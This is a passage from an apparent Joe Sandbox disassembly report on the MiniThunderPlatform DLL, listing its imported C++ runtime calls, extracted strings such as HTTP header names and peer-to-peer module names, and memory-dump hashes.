                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D10DA
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D1150
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1160
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1170
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1180
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D118D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D119A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(content-length), ref: 100D11AB
                                                                                                                                                • Part of subcall function 1007A7B0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 1007A7CD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D11D5
                                                                                                                                              • sprintf.MSVCR71(?,%ld,?), ref: 100D11EF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100D11FF
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D1213
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1220
                                                                                                                                              • sprintf.MSVCR71(?,%ld,?), ref: 100D1239
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100D124B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Length), ref: 100D1268
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D12EE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D12FB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1308
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1318
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 100D1335
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100D134D
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D135D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D136D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V12@V12@@$?append@?$basic_string@V01@@$H_prolog$?assign@?$basic_string@V01@Y?$basic_string@sprintf$??$?D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: %ld$Content-Length$content-length
                                                                                                                                              • API String ID: 2683903078-440850701
                                                                                                                                              • Opcode ID: e9ccd2b126e8ab8df9e1b197a2187095da685965ad467a779a6d8772345b76cb
                                                                                                                                              • Instruction ID: 29cadb685a180891815890d3241a25604a1ea077815c204bad2ae347f82859cc
                                                                                                                                              • Opcode Fuzzy Hash: e9ccd2b126e8ab8df9e1b197a2187095da685965ad467a779a6d8772345b76cb
                                                                                                                                              • Instruction Fuzzy Hash: 9B912071900218EFDB14DBA4CD4DBDEBBB8FF19354F108299E05AA3291DB746A49CF21
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100911AD
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71 ref: 1009125A
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,1027B190), ref: 10091269
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,1027B190), ref: 1009126F
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,1027B190), ref: 10091275
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,1027B190), ref: 1009127B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,?,1027B190), ref: 10091281
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,1027B190), ref: 10091287
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1009128D
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 10091294
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1009129B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100912A1
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100912A8
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100912AF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100912C3
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100912D2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009131F
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10091334
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100913B9
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100913CE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100913E5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100913F2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100914C0
                                                                                                                                                • Part of subcall function 1000F1E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,00000001,?,?,?,?,?,?,?,?,1001DF35,?,?,?,?), ref: 1000F2EE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10091536
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009154F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10091569
                                                                                                                                                • Part of subcall function 100BF990: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(channel_p2s,00000000,?), ref: 100BF9CE
                                                                                                                                                • Part of subcall function 100BF990: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100BF9E5
                                                                                                                                                • Part of subcall function 100BF990: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000001), ref: 100BFA18
                                                                                                                                                • Part of subcall function 100BF990: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BFA2A
                                                                                                                                                • Part of subcall function 100BF990: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100BFA45
                                                                                                                                                • Part of subcall function 100BF990: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100BFA73
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6D@std@@@0@V10@V?$basic_ostream@$??1?$basic_string@$??0?$basic_string@?assign@?$basic_string@V12@$??6?$basic_ostream@V01@V12@@$??0?$basic_stringstream@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@V01@@V?$basic_string@
                                                                                                                                              • String ID: ], BCID[$], CID[$], GCID[
                                                                                                                                              • API String ID: 650295696-684904080
                                                                                                                                              • Opcode ID: 39e23349b43f2c2581febb21b0ad97b9af65912229fd3abd6f0792191a724e54
                                                                                                                                              • Instruction ID: fd50a294b59ff539e2c903660c27b6b522f020c879bcc2257fc0678467fc2944
                                                                                                                                              • Opcode Fuzzy Hash: 39e23349b43f2c2581febb21b0ad97b9af65912229fd3abd6f0792191a724e54
                                                                                                                                              • Instruction Fuzzy Hash: 83027C74A083849BCB74CF24CC94BDE77E9EF99744F04851DE98D9B281CB30A944CBA2
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001163F
                                                                                                                                                • Part of subcall function 10010DB7: wcsrchr.MSVCR71(?,0000005C,00000000,?,10011661,?,?), ref: 10010DCD
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?,7C363127,10311990,00000104,100113A3,?,00000104,uuid), ref: 10010F97
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?), ref: 10010F9F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?,?), ref: 10011688
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?,?), ref: 10011699
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102780D8,?,?,?), ref: 100116AE
                                                                                                                                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@XZ.MSVCP71(00000001,?,?,?), ref: 100116C0
                                                                                                                                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP71(?,?,?), ref: 100116D0
                                                                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,?,?), ref: 100116F6
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              • ?open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXPBDHH@Z.MSVCP71(-00000004,00000001,000001B6,?,?,?), ref: 10011731
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 10011741
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,?,?), ref: 10011798
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(102780D4,00000000,?), ref: 100117B1
                                                                                                                                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000001,00000001), ref: 100117CC
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100117DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 100117ED
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102780D0), ref: 100117FF
                                                                                                                                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP71(?), ref: 1001181C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001182C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001183C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001184C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@std@@@std@@$wcslen$D@1@@std@@D@2@@0@V12@V?$basic_string@$??$?8??$?9??0?$basic_ifstream@?assign@?$basic_string@?clear@ios_base@std@@?close@?$basic_ifstream@?find@?$basic_string@?open@?$basic_ifstream@?substr@?$basic_string@ByteCharD?$basic_ifstream@H_prologMultiV12@@Widememsetwcsrchr
                                                                                                                                              • String ID: auto_test.cfg
                                                                                                                                              • API String ID: 1472417827-964236144
                                                                                                                                              • Opcode ID: e3a4b0ea4493ef759f06e1d8578ec9e22e1217940296261373955dc326bfe3e2
                                                                                                                                              • Instruction ID: 7b25f88155c44d0fd4f5c05a5292803ce71c897a17d4b5947443901596552a7f
                                                                                                                                              • Opcode Fuzzy Hash: e3a4b0ea4493ef759f06e1d8578ec9e22e1217940296261373955dc326bfe3e2
                                                                                                                                              • Instruction Fuzzy Hash: EC5150359052299FDB25DB60CC8DBDDB7B8EF28305F5041D8E40AA3191DB74AB88CF50
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 100901B2
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 100901D7
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 100901FC
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 10090221
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 10090246
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 10090257
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 10090274
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090281
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 10090298
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100902A5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100902B6
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100902C8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090317
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090328
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090343
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090354
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??3@$??0?$basic_string@CriticalDeleteSection$H_prologV01@@
                                                                                                                                              • String ID: .\p2sp_sub_task_imp.cpp$STATE_IDLE == _ctrl_state$thunder_assert
                                                                                                                                              • API String ID: 929414334-39187018
                                                                                                                                              • Opcode ID: 8e2be318c9684b4316a1b911a65de8b619d5b692ef1142173b12251e54afa213
                                                                                                                                              • Instruction ID: f817509184bc61a1055603f2aee733fe2f42312bee805cd1bd6ba3cc85fa90d7
                                                                                                                                              • Opcode Fuzzy Hash: 8e2be318c9684b4316a1b911a65de8b619d5b692ef1142173b12251e54afa213
                                                                                                                                              • Instruction Fuzzy Hash: 7BA158745047818FD720CF69C888A9ABBE4FF59304F50896DE0AF87652CB74B989CF52
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10018306
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,fs.dll), ref: 10018320
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,p2sp.dll), ref: 10018350
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??$?8D@1@@std@@D@2@@0@V?$basic_string@$H_prologmalloc
                                                                                                                                              • String ID: backend_agent.dll$down_dispatcher.dll$fs.dll$p2p.dll$p2p_local_res.dll$p2p_upload.dll$p2sp.dll$ptl.dll$xl_stat.dll
                                                                                                                                              • API String ID: 3073839786-2814801369
                                                                                                                                              • Opcode ID: e1921ed07532963dfecc0c45ce3ae901ed119d14690066b7e5b5ef3a5db6f875
                                                                                                                                              • Instruction ID: 74bf01a8f58d52b2d575e4c3b943c05d4dd8501586d7cf1f3c8d9308e69f7d3b
                                                                                                                                              • Opcode Fuzzy Hash: e1921ed07532963dfecc0c45ce3ae901ed119d14690066b7e5b5ef3a5db6f875
                                                                                                                                              • Instruction Fuzzy Hash: C241D235A06316AADF48DBB46D42B9E27D8DF907A1F20842BB405FB1C1DF74D7815714
                                                                                                                                              APIs
                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(00000038), ref: 100BC1CA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100BC1F9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(resource), ref: 100BC20D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC271
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC280
